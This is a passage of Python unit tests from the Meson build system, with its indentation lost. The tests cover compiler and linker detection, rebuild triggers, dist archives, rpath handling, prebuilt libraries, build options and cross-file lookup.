wcc = getattr(env, 'detect_{}_compiler'.format(lang))(MachineChoice.HOST)
# Check static linker too
wrapperlinker = python_command + [wrapper] + linker.get_exelist() + linker.get_always_args()
wrapperlinker_s = ''
for w in wrapperlinker:
wrapperlinker_s += quote_arg(w) + ' '
os.environ['AR'] = wrapperlinker_s
wlinker = env.detect_static_linker(wcc)
# Pop it so we don't use it for the next detection
evalue = os.environ.pop('AR')
# Must be the same type since it's a wrapper around the same exelist
self.assertIs(type(cc), type(wcc))
self.assertIs(type(linker), type(wlinker))
# Ensure that the exelist is correct
self.assertEqual(wcc.get_exelist(), wrappercc)
self.assertEqual(wlinker.get_exelist(), wrapperlinker)
# Ensure that the version detection worked correctly
self.assertEqual(cc.version, wcc.version)
if hasattr(cc, 'is_64'):
self.assertEqual(cc.is_64, wcc.is_64)
def test_always_prefer_c_compiler_for_asm(self):
testdir = os.path.join(self.common_test_dir, '137 c cpp and asm')
# Skip if building with MSVC
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'msvc':
raise unittest.SkipTest('MSVC can\'t compile assembly')
self.init(testdir)
commands = {'c-asm': {}, 'cpp-asm': {}, 'cpp-c-asm': {}, 'c-cpp-asm': {}}
for cmd in self.get_compdb():
# Get compiler
split = split_args(cmd['command'])
if split[0] == 'ccache':
compiler = split[1]
else:
compiler = split[0]
# Classify commands
if 'Ic-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-asm']['c'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Icpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-asm?'.format(cmd['command']))
elif 'Ic-cpp-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['c-cpp-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['c-cpp-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['c-cpp-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in c-cpp-asm?'.format(cmd['command']))
elif 'Icpp-c-asm' in cmd['command']:
if cmd['file'].endswith('.S'):
commands['cpp-c-asm']['asm'] = compiler
elif cmd['file'].endswith('.c'):
commands['cpp-c-asm']['c'] = compiler
elif cmd['file'].endswith('.cpp'):
commands['cpp-c-asm']['cpp'] = compiler
else:
raise AssertionError('{!r} found in cpp-c-asm?'.format(cmd['command']))
else:
raise AssertionError('Unknown command {!r} found'.format(cmd['command']))
# Check that .S files are always built with the C compiler
self.assertEqual(commands['c-asm']['asm'], commands['c-asm']['c'])
self.assertEqual(commands['c-asm']['asm'], commands['cpp-asm']['asm'])
self.assertEqual(commands['cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['c-cpp-asm']['asm'], commands['c-cpp-asm']['c'])
self.assertEqual(commands['cpp-c-asm']['asm'], commands['cpp-c-asm']['c'])
self.assertNotEqual(commands['cpp-asm']['asm'], commands['cpp-asm']['cpp'])
self.assertNotEqual(commands['c-cpp-asm']['c'], commands['c-cpp-asm']['cpp'])
self.assertNotEqual(commands['cpp-c-asm']['c'], commands['cpp-c-asm']['cpp'])
# Check that the c-asm target is always linked with the C linker
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
m = re.search('build c-asm.*: c_LINKER', contents)
self.assertIsNotNone(m, msg=contents)
def test_preprocessor_checks_CPPFLAGS(self):
'''
Test that preprocessor compiler checks read CPPFLAGS and also CFLAGS but
not LDFLAGS.
'''
testdir = os.path.join(self.common_test_dir, '136 get define')
define = 'MESON_TEST_DEFINE_VALUE'
# NOTE: this list can't have \n, ' or "
# \n is never substituted by the GNU pre-processor via a -D define
# ' and " confuse split_args() even when they are escaped
# % and # confuse the MSVC preprocessor
# !, ^, *, and < confuse lcc preprocessor
value = 'spaces and fun@$&()-=_+{}[]:;>?,./~`'
for env_var in ['CPPFLAGS', 'CFLAGS']:
env = {}
env[env_var] = '-D{}="{}"'.format(define, value)
env['LDFLAGS'] = '-DMESON_FAIL_VALUE=cflags-read'.format(define)
self.init(testdir, extra_args=['-D{}={}'.format(define, value)], override_envvars=env)
def test_custom_target_exe_data_deterministic(self):
testdir = os.path.join(self.common_test_dir, '113 custom target capture')
self.init(testdir)
meson_exe_dat1 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.wipe()
self.init(testdir)
meson_exe_dat2 = glob(os.path.join(self.privatedir, 'meson_exe*.dat'))
self.assertListEqual(meson_exe_dat1, meson_exe_dat2)
def test_noop_changes_cause_no_rebuilds(self):
'''
Test that no-op changes to the build files such as mtime do not cause
a rebuild of anything.
'''
testdir = os.path.join(self.common_test_dir, '6 linkshared')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of meson.build should not rebuild anything
self.utime(os.path.join(testdir, 'meson.build'))
self.assertReconfiguredBuildIsNoop()
# Changing mtime of libefile.c should rebuild the library, but not relink the executable
self.utime(os.path.join(testdir, 'libfile.c'))
self.assertBuildRelinkedOnlyTarget('mylib')
def test_source_changes_cause_rebuild(self):
'''
Test that changes to sources and headers cause rebuilds, but not
changes to unused files (as determined by the dependency file) in the
input files list.
'''
testdir = os.path.join(self.common_test_dir, '20 header in file list')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of header.h should rebuild everything
self.utime(os.path.join(testdir, 'header.h'))
self.assertBuildRelinkedOnlyTarget('prog')
def test_custom_target_changes_cause_rebuild(self):
'''
Test that in a custom target, changes to the input files, the
ExternalProgram, and any File objects on the command-line cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '60 custom header generator')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of these should rebuild everything
for f in ('input.def', 'makeheader.py', 'somefile.txt'):
self.utime(os.path.join(testdir, f))
self.assertBuildRelinkedOnlyTarget('prog')
def test_source_generator_program_cause_rebuild(self):
'''
Test that changes to generator programs in the source tree cause
a rebuild.
'''
testdir = os.path.join(self.common_test_dir, '94 gen extra')
self.init(testdir)
self.build()
# Immediately rebuilding should not do anything
self.assertBuildIsNoop()
# Changing mtime of generator should rebuild the executable
self.utime(os.path.join(testdir, 'srcgen.py'))
self.assertRebuiltTarget('basic')
def test_static_library_lto(self):
'''
Test that static libraries can be built with LTO and linked to
executables. On Linux, this requires the use of gcc-ar.
https://github.com/mesonbuild/meson/issues/1646
'''
testdir = os.path.join(self.common_test_dir, '5 linkstatic')
env = get_fake_env(testdir, self.builddir, self.prefix)
if env.detect_c_compiler(MachineChoice.HOST).get_id() == 'clang' and is_windows():
raise unittest.SkipTest('LTO not (yet) supported by windows clang')
self.init(testdir, extra_args='-Db_lto=true')
self.build()
self.run_tests()
def test_dist_git(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
self.dist_impl(_git_init)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def test_dist_hg(self):
if not shutil.which('hg'):
raise unittest.SkipTest('Mercurial not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
def hg_init(project_dir):
subprocess.check_call(['hg', 'init'], cwd=project_dir)
with open(os.path.join(project_dir, '.hg', 'hgrc'), 'w') as f:
print('[ui]', file=f)
print('username=Author Person <teh_coderz@example.com>', file=f)
subprocess.check_call(['hg', 'add', 'meson.build', 'distexe.c'], cwd=project_dir)
subprocess.check_call(['hg', 'commit', '-m', 'I am a project'], cwd=project_dir)
try:
self.dist_impl(hg_init, include_subprojects=False)
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the hg files so cleaning up the dir
# fails sometimes.
pass
def test_dist_git_script(self):
if not shutil.which('git'):
raise unittest.SkipTest('Git not found')
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Dist is only supported with Ninja')
try:
with tempfile.TemporaryDirectory() as tmpdir:
project_dir = os.path.join(tmpdir, 'a')
shutil.copytree(os.path.join(self.unit_test_dir, '35 dist script'),
project_dir)
_git_init(project_dir)
self.init(project_dir)
self.build('dist')
except PermissionError:
# When run under Windows CI, something (virus scanner?)
# holds on to the git files so cleaning up the dir
# fails sometimes.
pass
def create_dummy_subproject(self, project_dir, name):
path = os.path.join(project_dir, 'subprojects', name)
os.makedirs(path)
with open(os.path.join(path, 'meson.build'), 'w') as ofile:
ofile.write("project('{}')".format(name))
return path
def dist_impl(self, vcs_init, include_subprojects=True):
# Create this on the fly because having rogue .git directories inside
# the source tree leads to all kinds of trouble.
with tempfile.TemporaryDirectory() as project_dir:
with open(os.path.join(project_dir, 'meson.build'), 'w') as ofile:
ofile.write('''project('disttest', 'c', version : '1.4.3')
e = executable('distexe', 'distexe.c')
test('dist test', e)
subproject('vcssub', required : false)
subproject('tarballsub', required : false)
''')
with open(os.path.join(project_dir, 'distexe.c'), 'w') as ofile:
ofile.write('''#include<stdio.h>
int main(int argc, char **argv) {
printf("I am a distribution test.\\n");
return 0;
}
''')
xz_distfile = os.path.join(self.distdir, 'disttest-1.4.3.tar.xz')
xz_checksumfile = xz_distfile + '.sha256sum'
zip_distfile = os.path.join(self.distdir, 'disttest-1.4.3.zip')
zip_checksumfile = zip_distfile + '.sha256sum'
vcs_init(project_dir)
if include_subprojects:
vcs_init(self.create_dummy_subproject(project_dir, 'vcssub'))
self.create_dummy_subproject(project_dir, 'tarballsub')
self.create_dummy_subproject(project_dir, 'unusedsub')
self.init(project_dir)
self.build('dist')
self.assertPathExists(xz_distfile)
self.assertPathExists(xz_checksumfile)
self.assertPathDoesNotExist(zip_distfile)
self.assertPathDoesNotExist(zip_checksumfile)
self._run(self.meson_command + ['dist', '--formats', 'zip'],
workdir=self.builddir)
self.assertPathExists(zip_distfile)
self.assertPathExists(zip_checksumfile)
if include_subprojects:
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c']),
sorted(z.namelist()))
self._run(self.meson_command + ['dist', '--formats', 'zip', '--include-subprojects'],
workdir=self.builddir)
z = zipfile.ZipFile(zip_distfile)
self.assertEqual(sorted(['disttest-1.4.3/',
'disttest-1.4.3/subprojects/',
'disttest-1.4.3/meson.build',
'disttest-1.4.3/distexe.c',
'disttest-1.4.3/subprojects/tarballsub/',
'disttest-1.4.3/subprojects/vcssub/',
'disttest-1.4.3/subprojects/tarballsub/meson.build',
'disttest-1.4.3/subprojects/vcssub/meson.build']),
sorted(z.namelist()))
def test_rpath_uses_ORIGIN(self):
'''
Test that built targets use $ORIGIN in rpath, which ensures that they
are relocatable and ensures that builds are reproducible since the
build directory won't get embedded into the built binaries.
'''
if is_windows() or is_cygwin():
raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
testdir = os.path.join(self.common_test_dir, '42 library chain')
self.init(testdir)
self.build()
for each in ('prog', 'subdir/liblib1.so', ):
rpath = get_rpath(os.path.join(self.builddir, each))
self.assertTrue(rpath, 'Rpath could not be determined for {}.'.format(each))
if is_dragonflybsd():
# DragonflyBSD will prepend /usr/lib/gccVERSION to the rpath,
# so ignore that.
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
rpaths = rpath.split(':')[1:]
else:
rpaths = rpath.split(':')
for path in rpaths:
self.assertTrue(path.startswith('$ORIGIN'), msg=(each, path))
# These two don't link to anything else, so they do not need an rpath entry.
for each in ('subdir/subdir2/liblib2.so', 'subdir/subdir3/liblib3.so'):
rpath = get_rpath(os.path.join(self.builddir, each))
if is_dragonflybsd():
# The rpath should be equal to /usr/lib/gccVERSION
self.assertTrue(rpath.startswith('/usr/lib/gcc'))
self.assertEqual(len(rpath.split(':')), 1)
else:
self.assertTrue(rpath is None)
def test_dash_d_dedup(self):
testdir = os.path.join(self.unit_test_dir, '9 d dedup')
self.init(testdir)
cmd = self.get_compdb()[0]['command']
self.assertTrue('-D FOO -D BAR' in cmd or
'"-D" "FOO" "-D" "BAR"' in cmd or
'/D FOO /D BAR' in cmd or
'"/D" "FOO" "/D" "BAR"' in cmd)
def test_all_forbidden_targets_tested(self):
'''
Test that all forbidden targets are tested in the '154 reserved targets'
test. Needs to be a unit test because it accesses Meson internals.
'''
testdir = os.path.join(self.common_test_dir, '154 reserved targets')
targets = mesonbuild.coredata.forbidden_target_names
# We don't actually define a target with this name
targets.pop('build.ninja')
# Remove this to avoid multiple entries with the same name
# but different case.
targets.pop('PHONY')
for i in targets:
self.assertPathExists(os.path.join(testdir, i))
def detect_prebuild_env(self):
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
stlinker = env.detect_static_linker(cc)
if mesonbuild.mesonlib.is_windows():
object_suffix = 'obj'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_cygwin():
object_suffix = 'o'
shared_suffix = 'dll'
elif mesonbuild.mesonlib.is_osx():
object_suffix = 'o'
shared_suffix = 'dylib'
else:
object_suffix = 'o'
shared_suffix = 'so'
return (cc, stlinker, object_suffix, shared_suffix)
def pbcompile(self, compiler, source, objectfile, extra_args=None):
cmd = compiler.get_exelist()
extra_args = extra_args or []
if compiler.get_argument_syntax() == 'msvc':
cmd += ['/nologo', '/Fo' + objectfile, '/c', source] + extra_args
else:
cmd += ['-c', source, '-o', objectfile] + extra_args
subprocess.check_call(cmd, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def test_prebuilt_object(self):
(compiler, _, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '15 prebuilt object')
source = os.path.join(tdir, 'source.c')
objectfile = os.path.join(tdir, 'prebuilt.' + object_suffix)
self.pbcompile(compiler, source, objectfile)
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(objectfile)
def build_static_lib(self, compiler, linker, source, objectfile, outfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = ['lib', '/NOLOGO', '/OUT:' + outfile, objectfile]
else:
link_cmd = ['ar', 'csr', outfile, objectfile]
link_cmd = linker.get_exelist()
link_cmd += linker.get_always_args()
link_cmd += linker.get_std_link_args()
link_cmd += linker.get_output_args(outfile)
link_cmd += [objectfile]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_static_lib(self):
(cc, stlinker, object_suffix, _) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '16 prebuilt static')
source = os.path.join(tdir, 'libdir/best.c')
objectfile = os.path.join(tdir, 'libdir/best.' + object_suffix)
stlibfile = os.path.join(tdir, 'libdir/libbest.a')
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
def build_shared_lib(self, compiler, source, objectfile, outfile, impfile, extra_args=None):
if extra_args is None:
extra_args = []
if compiler.get_argument_syntax() == 'msvc':
link_cmd = compiler.get_linker_exelist() + [
'/NOLOGO', '/DLL', '/DEBUG', '/IMPLIB:' + impfile,
'/OUT:' + outfile, objectfile]
else:
if not (compiler.info.is_windows() or compiler.info.is_cygwin() or compiler.info.is_darwin()):
extra_args += ['-fPIC']
link_cmd = compiler.get_exelist() + ['-shared', '-o', outfile, objectfile]
if not mesonbuild.mesonlib.is_osx():
link_cmd += ['-Wl,-soname=' + os.path.basename(outfile)]
self.pbcompile(compiler, source, objectfile, extra_args=extra_args)
try:
subprocess.check_call(link_cmd)
finally:
os.unlink(objectfile)
def test_prebuilt_shared_lib(self):
(cc, _, object_suffix, shared_suffix) = self.detect_prebuild_env()
tdir = os.path.join(self.unit_test_dir, '17 prebuilt shared')
source = os.path.join(tdir, 'alexandria.c')
objectfile = os.path.join(tdir, 'alexandria.' + object_suffix)
impfile = os.path.join(tdir, 'alexandria.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(tdir, 'alexandria.' + shared_suffix)
elif is_cygwin():
shlibfile = os.path.join(tdir, 'cygalexandria.' + shared_suffix)
else:
shlibfile = os.path.join(tdir, 'libalexandria.' + shared_suffix)
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run the test
try:
self.init(tdir)
self.build()
self.run_tests()
finally:
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(tdir, 'alexandria.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_static(self):
'''
Test that the we prefer static libraries when `static: true` is
passed to dependency() with pkg-config. Can't be an ordinary test
because we need to build libs and try to find them from meson.build
Also test that it's not a hard error to have unsatisfiable library deps
since system libraries -lm will never be found statically.
https://github.com/mesonbuild/meson/issues/2785
'''
(cc, stlinker, objext, shext) = self.detect_prebuild_env()
testdir = os.path.join(self.unit_test_dir, '18 pkgconfig static')
source = os.path.join(testdir, 'foo.c')
objectfile = os.path.join(testdir, 'foo.' + objext)
stlibfile = os.path.join(testdir, 'libfoo.a')
impfile = os.path.join(testdir, 'foo.lib')
if cc.get_argument_syntax() == 'msvc':
shlibfile = os.path.join(testdir, 'foo.' + shext)
elif is_cygwin():
shlibfile = os.path.join(testdir, 'cygfoo.' + shext)
else:
shlibfile = os.path.join(testdir, 'libfoo.' + shext)
# Build libs
self.build_static_lib(cc, stlinker, source, objectfile, stlibfile, extra_args=['-DFOO_STATIC'])
self.build_shared_lib(cc, source, objectfile, shlibfile, impfile)
# Run test
try:
self.init(testdir, override_envvars={'PKG_CONFIG_LIBDIR': self.builddir})
self.build()
self.run_tests()
finally:
os.unlink(stlibfile)
os.unlink(shlibfile)
if mesonbuild.mesonlib.is_windows():
# Clean up all the garbage MSVC writes in the
# source tree.
for fname in glob(os.path.join(testdir, 'foo.*')):
if os.path.splitext(fname)[1] not in ['.c', '.h', '.in']:
os.unlink(fname)
@skipIfNoPkgconfig
def test_pkgconfig_gen_escaping(self):
testdir = os.path.join(self.common_test_dir, '47 pkgconfig-gen')
prefix = '/usr/with spaces'
libdir = 'lib'
self.init(testdir, extra_args=['--prefix=' + prefix,
'--libdir=' + libdir])
# Find foo dependency
os.environ['PKG_CONFIG_LIBDIR'] = self.privatedir
env = get_fake_env(testdir, self.builddir, self.prefix)
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('libfoo', env, kwargs)
# Ensure link_args are properly quoted
libdir = PurePath(prefix) / PurePath(libdir)
link_args = ['-L' + libdir.as_posix(), '-lfoo']
self.assertEqual(foo_dep.get_link_args(), link_args)
# Ensure include args are properly quoted
incdir = PurePath(prefix) / PurePath('include')
cargs = ['-I' + incdir.as_posix()]
self.assertEqual(foo_dep.get_compile_args(), cargs)
def test_array_option_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
expected['value'] = ['oink', 'boink']
self.setconf('-Dlist=oink,boink')
changed = get_opt()
self.assertEqual(changed, expected)
def test_array_option_bad_change(self):
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': ['foo', 'bar'],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir)
original = get_opt()
self.assertDictEqual(original, expected)
with self.assertRaises(subprocess.CalledProcessError):
self.setconf('-Dlist=bad')
changed = get_opt()
self.assertDictEqual(changed, expected)
def test_array_option_empty_equivalents(self):
"""Array options treat -Dopt=[] and -Dopt= as equivalent."""
def get_opt():
opts = self.introspect('--buildoptions')
for x in opts:
if x.get('name') == 'list':
return x
raise Exception(opts)
expected = {
'name': 'list',
'description': 'list',
'section': 'user',
'type': 'array',
'value': [],
'machine': 'any',
}
tdir = os.path.join(self.unit_test_dir, '19 array option')
self.init(tdir, extra_args='-Dlist=')
original = get_opt()
self.assertDictEqual(original, expected)
def opt_has(self, name, value):
res = self.introspect('--buildoptions')
found = False
for i in res:
if i['name'] == name:
self.assertEqual(i['value'], value)
found = True
break
self.assertTrue(found, "Array option not found in introspect data.")
def test_free_stringarray_setting(self):
testdir = os.path.join(self.common_test_dir, '43 options')
self.init(testdir)
self.opt_has('free_array_opt', [])
self.setconf('-Dfree_array_opt=foo,bar', will_build=False)
self.opt_has('free_array_opt', ['foo', 'bar'])
self.setconf("-Dfree_array_opt=['a,b', 'c,d']", will_build=False)
self.opt_has('free_array_opt', ['a,b', 'c,d'])
def test_subproject_promotion(self):
testdir = os.path.join(self.unit_test_dir, '12 promote')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
s3dir = os.path.join(spdir, 's3')
scommondir = os.path.join(spdir, 'scommon')
self.assertFalse(os.path.isdir(s3dir))
subprocess.check_call(self.wrap_command + ['promote', 's3'], cwd=workdir)
self.assertTrue(os.path.isdir(s3dir))
self.assertFalse(os.path.isdir(scommondir))
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'scommon'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'invalid/path/to/scommon'],
cwd=workdir,
stderr=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isdir(scommondir))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/scommon'], cwd=workdir)
self.assertTrue(os.path.isdir(scommondir))
promoted_wrap = os.path.join(spdir, 'athing.wrap')
self.assertFalse(os.path.isfile(promoted_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'athing'], cwd=workdir)
self.assertTrue(os.path.isfile(promoted_wrap))
self.init(workdir)
self.build()
def test_subproject_promotion_wrap(self):
testdir = os.path.join(self.unit_test_dir, '44 promote wrap')
workdir = os.path.join(self.builddir, 'work')
shutil.copytree(testdir, workdir)
spdir = os.path.join(workdir, 'subprojects')
ambiguous_wrap = os.path.join(spdir, 'ambiguous.wrap')
self.assertNotEqual(subprocess.call(self.wrap_command + ['promote', 'ambiguous'],
cwd=workdir,
stdout=subprocess.DEVNULL), 0)
self.assertFalse(os.path.isfile(ambiguous_wrap))
subprocess.check_call(self.wrap_command + ['promote', 'subprojects/s2/subprojects/ambiguous.wrap'], cwd=workdir)
self.assertTrue(os.path.isfile(ambiguous_wrap))
def test_warning_location(self):
tdir = os.path.join(self.unit_test_dir, '22 warning location')
out = self.init(tdir)
for expected in [
r'meson.build:4: WARNING: Keyword argument "link_with" defined multiple times.',
r'sub' + os.path.sep + r'meson.build:3: WARNING: Keyword argument "link_with" defined multiple times.',
r'meson.build:6: WARNING: a warning of some sort',
r'sub' + os.path.sep + r'meson.build:4: WARNING: subdir warning',
r'meson.build:7: WARNING: Module unstable-simd has no backwards or forwards compatibility and might not exist in future releases.',
r"meson.build:11: WARNING: The variable(s) 'MISSING' in the input file 'conf.in' are not present in the given configuration data.",
r'meson.build:1: WARNING: Passed invalid keyword argument "invalid".',
]:
self.assertRegex(out, re.escape(expected))
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
self.new_builddir()
out = self.init(tdir, workdir=wd)
expected = os.path.join(relpath(tdir, self.src_root), 'meson.build')
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, out)
def test_error_location_path(self):
'''Test locations in meson errors contain correct paths'''
# this list contains errors from all the different steps in the
# lexer/parser/interpreter we have tests for.
for (t, f) in [
('10 out of bounds', 'meson.build'),
('18 wrong plusassign', 'meson.build'),
('61 bad option argument', 'meson_options.txt'),
('100 subdir parse error', os.path.join('subdir', 'meson.build')),
('101 invalid option file', 'meson_options.txt'),
]:
tdir = os.path.join(self.src_root, 'test cases', 'failing', t)
for wd in [
self.src_root,
self.builddir,
os.getcwd(),
]:
try:
self.init(tdir, workdir=wd)
except subprocess.CalledProcessError as e:
expected = os.path.join('test cases', 'failing', t, f)
relwd = relpath(self.src_root, wd)
if relwd != '.':
expected = os.path.join(relwd, expected)
expected = '\n' + expected + ':'
self.assertIn(expected, e.output)
else:
self.fail('configure unexpectedly succeeded')
def test_permitted_method_kwargs(self):
tdir = os.path.join(self.unit_test_dir, '25 non-permitted kwargs')
out = self.init(tdir)
for expected in [
r'WARNING: Passed invalid keyword argument "prefixxx".',
r'WARNING: Passed invalid keyword argument "argsxx".',
r'WARNING: Passed invalid keyword argument "invalidxx".',
]:
self.assertRegex(out, re.escape(expected))
def test_templates(self):
ninja = detect_ninja()
if ninja is None:
raise unittest.SkipTest('This test currently requires ninja. Fix this once "meson build" works.')
langs = ['c']
env = get_fake_env()
try:
env.detect_cpp_compiler(MachineChoice.HOST)
langs.append('cpp')
except EnvironmentException:
pass
try:
env.detect_cs_compiler(MachineChoice.HOST)
langs.append('cs')
except EnvironmentException:
pass
try:
env.detect_d_compiler(MachineChoice.HOST)
langs.append('d')
except EnvironmentException:
pass
try:
env.detect_java_compiler(MachineChoice.HOST)
langs.append('java')
except EnvironmentException:
pass
try:
env.detect_cuda_compiler(MachineChoice.HOST)
langs.append('cuda')
except EnvironmentException:
pass
try:
env.detect_fortran_compiler(MachineChoice.HOST)
langs.append('fortran')
except EnvironmentException:
pass
try:
env.detect_objc_compiler(MachineChoice.HOST)
langs.append('objc')
except EnvironmentException:
pass
try:
env.detect_objcpp_compiler(MachineChoice.HOST)
langs.append('objcpp')
except EnvironmentException:
pass
# FIXME: omitting rust as Windows AppVeyor CI finds Rust but doesn't link correctly
for lang in langs:
for target_type in ('executable', 'library'):
# test empty directory
with tempfile.TemporaryDirectory() as tmpdir:
self._run(self.meson_command + ['init', '--language', lang, '--type', target_type],
workdir=tmpdir)
self._run(self.setup_command + ['--backend=ninja', 'builddir'],
workdir=tmpdir)
self._run(ninja,
workdir=os.path.join(tmpdir, 'builddir'))
# test directory with existing code file
if lang in ('c', 'cpp'):
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'foo.' + lang), 'w') as f:
f.write('int main(void) {}')
self._run(self.meson_command + ['init', '-b'], workdir=tmpdir)
# The test uses mocking and thus requires that
# the current process is the one to run the Meson steps.
# If we are using an external test executable (most commonly
# in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
if is_sunos():
cc = 'gcc'
else:
cc = 'cc'
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = textwrap.dedent("""\
[binaries]
c = '/usr/bin/{}'
ar = '/usr/bin/ar'
strip = '/usr/bin/ar'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""".format(cc))
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, os mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def test_compiler_run_command(self):
'''
The test checks that the compiler object can be passed to
run_command().
'''
testdir = os.path.join(self.unit_test_dir, '24 compiler run_command')
self.init(testdir)
def test_identical_target_name_in_subproject_flat_layout(self):
'''
Test that identical targets in different subprojects do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '177 identical target name in subproject flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_identical_target_name_in_subdir_flat_layout(self):
'''
Test that identical targets in different subdirs do not collide
if layout is flat.
'''
testdir = os.path.join(self.common_test_dir, '186 same target name flat layout')
self.init(testdir, extra_args=['--layout=flat'])
self.build()
def test_flock(self):
exception_raised = False
with tempfile.TemporaryDirectory() as tdir:
os.mkdir(os.path.join(tdir, 'meson-private'))
with BuildDirLock(tdir):
try:
with BuildDirLock(tdir):
pass
except MesonException:
exception_raised = True
self.assertTrue(exception_raised, 'Double locking did not raise exception.')
@unittest.skipIf(is_osx(), 'Test not applicable to OSX')
def test_check_module_linking(self):
"""
Test that link_with: a shared module issues a warning
